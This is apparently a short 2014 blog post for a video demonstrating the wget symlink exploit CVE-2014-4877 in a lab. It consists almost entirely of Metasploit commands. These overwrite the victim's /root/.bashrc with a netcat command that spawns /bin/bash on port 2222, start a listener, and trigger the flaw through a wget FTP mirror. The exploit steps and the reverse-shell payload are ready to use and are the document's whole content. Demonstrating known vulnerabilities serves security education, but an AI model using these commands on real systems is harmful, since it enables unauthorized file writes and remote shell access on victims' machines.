Archive | November 7, 2014
Video

Wget Exploit Demonstration: CVE-2014-4877

msf > use auxiliary/server/wget_symlink_file_write
msf auxiliary(wget_symlink_file_write) > show options
msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /root/.bashrc
msf auxiliary(wget_symlink_file_write) > set TARGET_DATA nc localhost 2222 -e /bin/bash &
msf auxiliary(wget_symlink_file_write) > exploit
nc -lvp 2222
wget -m ftp://192.168.2.104:2121/